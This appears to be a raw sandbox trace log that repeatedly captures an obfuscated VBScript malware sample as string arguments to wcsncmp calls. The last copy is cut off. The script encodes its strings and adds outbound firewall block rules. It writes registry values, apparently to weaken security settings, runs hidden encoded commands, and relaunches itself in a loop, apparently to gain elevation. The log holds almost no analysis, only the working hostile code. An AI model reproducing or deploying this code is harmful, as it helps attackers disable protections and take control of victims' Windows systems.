bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.318] wcsncmp (_String1="\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.318] wcsncmp (_String1="\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.318] wcsncmp (_String1="Function criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 57 [0226.318] wcsncmp (_String1="unction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, 